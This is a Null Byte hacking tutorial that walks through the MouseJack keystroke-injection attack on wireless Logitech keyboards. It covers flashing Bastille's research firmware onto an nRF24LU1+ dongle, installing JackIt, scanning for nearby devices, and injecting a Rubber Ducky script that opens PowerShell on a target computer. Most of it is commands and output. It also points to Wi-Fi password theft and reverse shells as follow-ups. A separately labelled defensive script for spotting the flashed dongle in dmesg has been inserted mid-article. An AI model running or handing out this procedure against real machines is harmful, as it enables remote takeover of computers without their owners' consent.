
Injecting Keystrokes into Logitech Keyboards with an nRF24LU1+ Transceiver « Null Byte :: WonderHowTo



MouseJack vulnerabilities were reported more than three years ago. Some manufacturers of wireless keyboards have since released firmware updates, but millions (if not billions) of keyboards worldwide remain unpatched, either because they cannot be updated or because the manufacturer never bothered to release a fix.

According to Bastille, "MouseJack is a class of vulnerabilities that affects the vast majority of wireless, non-Bluetooth keyboards and mice." Led by Marc Newlin, MouseJack exploits the willingness of a USB dongle (shown below) to accept unencrypted keystrokes from surrounding devices.

Image by tokyoneon/Null Byte

However, the concept of sniffing and injecting keystrokes was first published in 2010 by Thorsten Schroeder and Max Moser. Later, Travis Goodspeed published "Promiscuity is the nRF24L01+'s Duty," which expanded on the duo's work. Samy Kamkar debuted KeySweeper in 2015, an Arduino-based USB charger designed to passively detect and log keystrokes from Microsoft keyboards.

Marc discovered that wireless mice and keyboards made by AmazonBasics, Dell, Gigabyte, HP, Lenovo, Logitech, and Microsoft were all affected by many of the MouseJack vulnerabilities. An attacker with a Crazyradio PA device (nRF24LU1+) can inject keystrokes into most of these USB dongles, as well as sniff keystrokes and perform denial-of-service attacks. Ultimately, the attacker can compromise and remotely control a computer from up to 250 feet away.

Buy a Crazyradio PA USB Long-Range Radio Dongle: Amazon | Bitcraze

Crazyradio PA USB radio dongle based on the nRF24LU1+ from Nordic Semiconductor. Image by tokyoneon/Null Byte

To follow along, you will need an nRF24LU1+ radio transceiver such as the Crazyradio PA or similar.

Step 1: Flash the Firmware

To get started, new nRF24LU1+ hardware needs to be flashed with custom firmware that can scan for vulnerable devices and inject keystrokes. First, make sure Kali's APT package index is up to date:

  ~$ apt-get update

Several dependencies are required to run the Python scripts that build the firmware and automate the flashing process. Use the following apt-get command to make sure Git, Python, and the other required packages are installed and up to date.

  ~$ apt-get install sdcc binutils python python-pip git

Reading package lists... Done
Building dependency tree
Reading state information... Done
python is already the newest version (2.7.16-1).
python-pip is already the newest version (18.1-5).
The following packages were automatically installed and are no longer required:
  libpython3.6-minimal libpython3.6-stdlib python3.6 python3.6-minimal
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
  binutils-common binutils-x86-64-linux-gnu gputils gputils-common gputils-doc libbinutils sdcc-doc sdcc-libraries
Suggested packages:
  binutils-doc sdcc-ucsim
The following NEW packages will be installed:
  gputils gputils-common gputils-doc sdcc sdcc-doc sdcc-libraries
The following packages will be upgraded:
  binutils binutils-common binutils-x86-64-linux-gnu libbinutils
4 upgraded, 6 newly installed, 0 to remove and 108 not upgraded.
Need to get 9,868 kB of archives.
After this operation, 63.7 MB of additional disk space will be used.
Do you want to continue? [Y/n]

The version of pip available in the Kali repository may be outdated. Upgrade it with the following command.

  ~$ pip install --upgrade pip

Collecting pip
  Downloading https://files.pythonhosted.org/packages/f9/fb/863012b13912709c13cf5cfdbfb304fa6c727659d6290438e1a88df9d848/pip-19.1-py2.py3-none-any.whl (1.4MB)
    100% |████████████████████████████████| 1.4MB 114kB/s
Installing collected packages: pip
  Found existing installation: pip 18.1
    Not uninstalling pip at /usr/lib/python2.7/dist-packages, outside environment /usr
    Can't uninstall 'pip'. No files were found to uninstall.
Successfully installed pip-19.1

Further dependencies must be installed with pip. Use the -I (ignore installed) option when installing the PyUSB package, a Python module for USB access.

  ~$ pip install --upgrade -I pyusb

DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7.
Collecting pyusb
  Downloading https://files.pythonhosted.org/packages/5f/34/2095e821c01225377dda4ebdbd53d8316d6abb243c9bee43d3888fa91dd6/pyusb-1.0.2.tar.gz (54kB)
     |████████████████████████████████| 61kB 82kB/s
Building wheels for collected packages: pyusb
  Building wheel for pyusb (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/1f/a9/7e/d189b5030ee3a56f9b72c28281bb11d661b8ea312e28de08a5
Successfully built pyusb
Installing collected packages: pyusb
Successfully installed pyusb-1.0.2

Finally, install the latest PlatformIO package, an open-source ecosystem for IoT development.

  ~$ pip install --upgrade platformio

Collecting platformio
  Downloading https://files.pythonhosted.org/packages/fe/01/69aa7d8ef8cd74493338396ff86dc1bbfe85ae58b77fc705924c920a38eb/platformio-3.6.7-py27-none-any.whl (161kB)
     |████████████████████████████████| 163kB 92kB/s
Collecting pyserial!=3.3,<4,>=3 (from platformio)
  Downloading https://files.pythonhosted.org/packages/0d/e4/2a744dd9e3be04a0c0907414e2a01a7c88bb3915cbe3c8cc06e209f59c30/pyserial-3.4-py2.py3-none-any.whl (193kB)
     |████████████████████████████████| 194kB 179kB/s
Requirement already satisfied, skipping upgrade: requests<3,>=2.4.0 in /usr/lib/python2.7/dist-packages (from platformio) (2.21.0)
Collecting click<6,>=5 (from platformio)
  Downloading https://files.pythonhosted.org/packages/8f/98/14966b6d772fd5fba1eb3bb34a62a7f736d609572493397cdc5715c14514/click-5.1-py2.py3-none-any.whl (65kB)
     |████████████████████████████████| 71kB 188kB/s
Requirement already satisfied, skipping upgrade: colorama in /usr/lib/python2.7/dist-packages (from platformio) (0.3.7)
Collecting bottle<0.13 (from platformio)
  Downloading https://files.pythonhosted.org/packages/32/4e/ed046324d5ec980c252987c1dca191e001b9f06ceffaebf037eef469937c/bottle-0.12.16.tar.gz (72kB)
     |████████████████████████████████| 81kB 153kB/s
Collecting semantic_version<3,>=2.5.0 (from platformio)
  Downloading https://files.pythonhosted.org/packages/72/83/f76958017f3094b072d8e3a72d25c3ed65f754cc607fdb6a7b33d84ab1d5/semantic_version-2.6.0.tar.gz
Building wheels for collected packages: bottle, semantic-version
  Building wheel for bottle (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/0c/68/ac/1546dcb27101ca6c4e50c5b5da92dbd3307f07cda5d88e81c7
  Building wheel for semantic-version (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/60/bb/50/215d669d31f992767f5dd8d3c974e79261707ee7f898f0dc10
Successfully built bottle semantic-version
Installing collected packages: pyserial, click, bottle, semantic-version, platformio
  Found existing installation: click 7.0
    Uninstalling click-7.0:
      Successfully uninstalled click-7.0
Successfully installed bottle-0.12.16 click-5.1 platformio-3.6.7 pyserial-3.4 semantic-version-2.6.0

Step 2: Clone the MouseJack Repository

Clone the MouseJack repository of scripts from GitHub into the /opt directory.

  ~$ git clone https://github.com/BastilleResearch/mousejack /opt/mousejack

Cloning into '/opt/mousejack'...
remote: Enumerating objects: 285, done.
remote: Total 285 (delta 0), reused 0 (delta 0), pack-reused 285
Receiving objects: 100% (285/285), 8.63 MiB | 353.00 KiB/s, done.
Resolving deltas: 100% (131/131), done.

Change into the new mousejack/ directory.

  ~$ cd /opt/mousejack/

Use the submodule init option to initialize the local configuration file for the nrf-research-firmware submodule. This is the firmware that gets flashed onto the nRF24LU1+ device.

  /opt/mousejack$ git submodule init

Submodule 'nrf-research-firmware' (https://github.com/BastilleResearch/nrf-research-firmware.git) registered for path 'nrf-research-firmware'

Then use the submodule update option to fetch all of the submodule's data and check out the commit recorded in the parent repository.

  /opt/mousejack$ git submodule update

Cloning into '/opt/mousejack/nrf-research-firmware'...
Submodule path 'nrf-research-firmware': checked out '02b84d1c4e59c0fb98263c83b2e7c7f9863a3b93'

Change into the nrf-research-firmware/ directory.

  /opt/mousejack$ cd nrf-research-firmware/

Use the make command to run the build steps defined in the Makefile.

  /nrf-research-firmware$ make

mkdir -p bin
sdcc --model-large --std-c99 -c src/main.c -o bin/main.rel
sdcc --model-large --std-c99 -c src/usb.c -o bin/usb.rel
sdcc --model-large --std-c99 -c src/usb_desc.c -o bin/usb_desc.rel
sdcc --model-large --std-c99 -c src/radio.c -o bin/radio.rel
sdcc --xram-loc 0x8000 --xram-size 2048 --model-large bin/main.rel bin/usb.rel bin/usb_desc.rel bin/radio.rel -o bin/dongle.ihx
objcopy -I ihex bin/dongle.ihx -O binary bin/dongle.bin
objcopy --pad-to 26622 --gap-fill 255 -I ihex bin/dongle.ihx -O binary bin/dongle.formatted.bin
objcopy -I binary bin/dongle.formatted.bin -O ihex bin/dongle.formatted.ihx

At this point, the nRF24LU1+ device should be plugged into the computer. Then run the make install command.

  /nrf-research-firmware$ make install

./prog/usb-flasher/usb-flash.py bin/dongle.bin
[2019-04-25 23:55:44.351]  Looking for a compatible device that can jump to the Nordic bootloader
[2019-04-25 23:55:44.378]  Device found, jumping to the Nordic bootloader
[2019-04-25 23:55:44.969]  Looking for a device running the Nordic bootloader
[2019-04-25 23:55:45.171]  Writing image to flash
[2019-04-25 23:55:45.808]  Verifying write
[2019-04-25 23:55:45.867]  Firmware programming completed successfully
[2019-04-25 23:55:45.867]  Please unplug your dongle or breakout board and plug it back in.

Unplug the nRF24LU1+ from the computer as instructed. To verify the firmware was flashed, plug the nRF24LU1+ back in and use the dmesg command. The Product and Manufacturer lines should read "Research Firmware" and "RFStorm".

  /nrf-research-firmware$ dmesg

[ 2433.986481] usb 2-1: new full-speed USB device number 3 using xhci_hcd
[ 2434.136930] usb 2-1: New USB device found, idVendor=1915, idProduct=0102, bcdDevice= 0.01
[ 2434.136938] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 2434.136942] usb 2-1: Product: Research Firmware
[ 2434.136946] usb 2-1: Manufacturer: RFStorm
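The same dmesg fingerprint is useful from the other side of the fence: on a managed Linux host, a plugged-in dongle that enumerates with these identifiers is worth an alert. The following Python script is an added example for defenders, not code from the Null Byte article or from the MouseJack/JackIt projects. It groups kernel USB messages by device path and flags any device matching the idVendor/idProduct pair (1915:0102) or the Product/Manufacturer strings shown above. The sample dmesg text is constructed for the example; the second device in it, with the 1234:5678 identifiers and "ExampleCorp" strings, is a made-up benign device included so the filter has something to ignore.

```python
import re

# Constructed sample input: the research-firmware dongle lines shown in the
# article, followed by a made-up ordinary device (1234:5678 / ExampleCorp)
# that must NOT be flagged.
SAMPLE_DMESG = """\
[ 2433.986481] usb 2-1: new full-speed USB device number 3 using xhci_hcd
[ 2434.136930] usb 2-1: New USB device found, idVendor=1915, idProduct=0102, bcdDevice= 0.01
[ 2434.136938] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 2434.136942] usb 2-1: Product: Research Firmware
[ 2434.136946] usb 2-1: Manufacturer: RFStorm
[ 2500.000001] usb 1-3: new full-speed USB device number 4 using xhci_hcd
[ 2500.100000] usb 1-3: New USB device found, idVendor=1234, idProduct=5678, bcdDevice= 1.00
[ 2500.100010] usb 1-3: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 2500.100020] usb 1-3: Product: Example Keyboard
[ 2500.100030] usb 1-3: Manufacturer: ExampleCorp
"""

# "[ <ts>] usb <bus>-<port>[.<port>...]: <message>"
DEV_RE = re.compile(r"\]\s+usb\s+(?P<dev>[\d.-]+):\s+(?P<msg>.*)$", re.IGNORECASE)
IDS_RE = re.compile(r"idVendor=(?P<vid>[0-9a-fA-F]{4}),\s*idProduct=(?P<pid>[0-9a-fA-F]{4})")

# VID:PID the Bastille research firmware enumerates with (from the dmesg above).
KNOWN_RESEARCH_FIRMWARE_IDS = {("1915", "0102")}


def parse_usb_devices(dmesg_text):
    """Collect VID/PID and descriptor strings per USB device path."""
    devices = {}
    for line in dmesg_text.splitlines():
        m = DEV_RE.search(line)
        if not m:
            continue
        dev = devices.setdefault(m.group("dev"), {"path": m.group("dev")})
        msg = m.group("msg")
        ids = IDS_RE.search(msg)
        if ids:
            dev["vid"] = ids.group("vid").lower()
            dev["pid"] = ids.group("pid").lower()
        elif msg.startswith("Product: "):
            dev["product"] = msg[len("Product: "):].strip()
        elif msg.startswith("Manufacturer: "):
            dev["manufacturer"] = msg[len("Manufacturer: "):].strip()
    return list(devices.values())


def is_research_firmware(dev):
    """True if any of the three fingerprints from the article matches."""
    if (dev.get("vid"), dev.get("pid")) in KNOWN_RESEARCH_FIRMWARE_IDS:
        return True
    if "research firmware" in dev.get("product", "").lower():
        return True
    if dev.get("manufacturer", "").lower() == "rfstorm":
        return True
    return False


def find_research_firmware_dongles(dmesg_text):
    """Return the subset of parsed devices that look like a flashed nRF24LU1+."""
    return [d for d in parse_usb_devices(dmesg_text) if is_research_firmware(d)]


if __name__ == "__main__":
    import sys
    # Read real dmesg output from a pipe; fall back to the constructed sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DMESG
    for d in find_research_firmware_dongles(text):
        print("ALERT: research-firmware dongle on usb %s (%s:%s) product=%r manufacturer=%r"
              % (d["path"], d.get("vid"), d.get("pid"), d.get("product"), d.get("manufacturer")))
```

Run it as `dmesg | python3 detect_dongle.py` (the file name is an assumption). The string matches are there because VID:PID pairs are trivial to change in a rebuilt firmware, while the three checks together give the same device-class evidence that USB allowlisting tools act on.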

Step 3: Clone the JackIt Repository

Now that the nRF24LU1+ device is set up, it can be used to search the area for wireless mice and keyboards. The MouseJack repository contains several great Python scripts, but we'll use the JackIt script instead to automate keystroke injection.

JackIt was developed by phikshun and infamy and is an automation tool for using USB Rubber Ducky scripts.

First, clone the JackIt repository.

  ~$ git clone https://github.com/insecurityofthings/jackit.git /opt/jackit

Cloning into '/opt/jackit'...
remote: Enumerating objects: 718, done.
remote: Total 718 (delta 0), reused 0 (delta 0), pack-reused 718
Receiving objects: 100% (718/718), 171.39 KiB | 153.00 KiB/s, done.
Resolving deltas: 100% (439/439), done.

Change into the new jackit/ directory.

  ~$ cd /opt/jackit/

List the contents of the directory.

  /opt/jackit$ ls -la

total 48
drwxr-xr-x 6 root root 4096 Apr 26 22:25 .
drwxr-xr-x 6 root root 4096 Apr 26 22:25 ..
drwxr-xr-x 2 root root 4096 Apr 26 22:25 bin
drwxr-xr-x 2 root root 4096 Apr 26 22:25 examples
drwxr-xr-x 8 root root 4096 Apr 26 22:25 .git
-rw-r--r-- 1 root root 1072 Apr 26 22:25 .gitignore
drwxr-xr-x 5 root root 4096 Apr 26 22:25 jackit
-rw-r--r-- 1 root root 4743 Apr 26 22:25 README.md
-rw-r--r-- 1 root root   52 Apr 26 22:25 requirements.txt
-rwxr-xr-x 1 root root  594 Apr 26 22:25 setup.py
-rw-r--r-- 1 root root  289 Apr 26 22:25 tox.ini

Notice the "requirements.txt" file. It indicates that several dependencies need to be installed with pip. Install them with the following command; that completes the setup.

  /opt/jackit$ pip install -e .

Obtaining file:///opt/jackit
Requirement already satisfied: click==5.1 in /usr/local/lib/python2.7/dist-packages (from JackIt==0.1.0) (5.1)
Collecting pyusb==1.0.0 (from JackIt==0.1.0)
  Downloading https://files.pythonhosted.org/packages/8a/19/66fb48a4905e472f5dfeda3a1bafac369fbf6d6fc5cf55b780864962652d/PyUSB-1.0.0.tar.gz (52kB)
     |████████████████████████████████| 61kB 81kB/s
Collecting six==1.10.0 (from JackIt==0.1.0)
  Downloading https://files.pythonhosted.org/packages/c8/0a/b6723e1bc4c516cb687841499455a8505b44607ab535be01091c0f24f079/six-1.10.0-py2.py3-none-any.whl
Collecting tabulate==0.7.5 (from JackIt==0.1.0)
  Downloading https://files.pythonhosted.org/packages/db/40/6ffc855c365769c454591ac30a25e9ea0b3e8c952a1259141f5b9878bd3d/tabulate-0.7.5.tar.gz
Building wheels for collected packages: pyusb, tabulate
  Building wheel for pyusb (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/a6/69/c7/258e736ee9bdb4553bd9701424b259436b979cf96201af612f
  Building wheel for tabulate (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/96/9c/9a/369b6376b11523584a6040a89488c28f0f88cb52167dceb648
Successfully built pyusb tabulate
Installing collected packages: pyusb, six, tabulate, JackIt
  Found existing installation: pyusb 1.0.2
    Uninstalling pyusb-1.0.2:
      Successfully uninstalled pyusb-1.0.2
  Found existing installation: six 1.12.0
    Uninstalling six-1.12.0:
      Successfully uninstalled six-1.12.0
  Running setup.py develop for JackIt
Successfully installed JackIt pyusb-1.0.0 six-1.10.0 tabulate-0.7.5

Step 4: Attack Wireless Keyboards and Mice

Scan the area for vulnerable devices by simply running jackit in any terminal.

  ~$ jackit

(JackIt ASCII-art banner)
JackIt Version 1.00
Created by phikshun, infamy

[!] You must specify a ducky script using --script.
[!] Attacks are disabled.
[+] Scanning...

[+] Scanning every 5s CTRL-C when ready.

  KEY  ADDRESS         CHANNELS  COUNT  SEEN         TYPE          PACKET
-----  --------------  --------  -----  -----------  ------------  -----------------------------
    1  C7:D4:21:98:07  74        3      0:00:07 ago  Logitech HID  00:C2:00:00:03:10:00:00:00:2B

JackIt continuously scans the area for wireless mice and keyboards. A vulnerable device is identified in the terminal by its address (serial number), channel, and type. This information can be used for a targeted attack. For example, with the following USB Rubber Ducky payload, you can open a Run window and inject keystrokes into the target computer.

  GUI r
DELAY 1000
STRING Powershell 
ENTER 

To use the USB Rubber Ducky script with JackIt, use the following command.

  ~$ jackit --reset --address C7:D4:21:98:07 --vendor Logitech --script /path/to/ducky/script.txt

Press Ctrl + C to stop the scan. JackIt will then ask which address the keystrokes should be injected into. Since this is a targeted attack, only one serial number appears in the scan. Press 1 and then Enter.

  [+] Sniffing for C7:D4:21:98:07 every 5s CTRL-C when ready.

  KEY  ADDRESS         CHANNELS  COUNT  SEEN         TYPE          PACKET
-----  --------------  --------  -----  -----------  ------------  -----------------------------
    1  C7:D4:21:98:07  2         1      0:00:10 ago  Logitech HID  00:C2:00:00:00:00:00:00:00:00
^C

[+] Select target keys (1-1) separated by commas, or 'all': [all]: 1
[+] Ping success on channel 65
[+] Sending attack to C7:D4:21:98:07 [Logitech HID] on channel 65

[+] All attacks completed

When the keystrokes are injected, the target computer carries out the commands in the script: the Ducky script opens the Run dialog and types "powershell" into it. More complex PowerShell attacks can include exfiltrating Wi-Fi passwords, streaming the Windows 10 desktop, and Powercat reverse shells with the payload hosted on Microsoft servers.

Since Marc and Bastille released the MouseJack white paper in 2016, some manufacturers have released firmware updates for products that do not use one-time programmable read-only memory (PROM). Most vulnerable USB dongles cannot be patched because of this hardware limitation. This does not apply to Logitech devices, which need to be patched manually. Other manufacturers have not pushed firmware updates, leaving an unknown number of vulnerable products in use worldwide.

Thanks for reading! If you have any questions, you can leave a comment here or message me on Twitter @tokyoneon_.


Cover image and GIF by tokyoneon/Null Byte



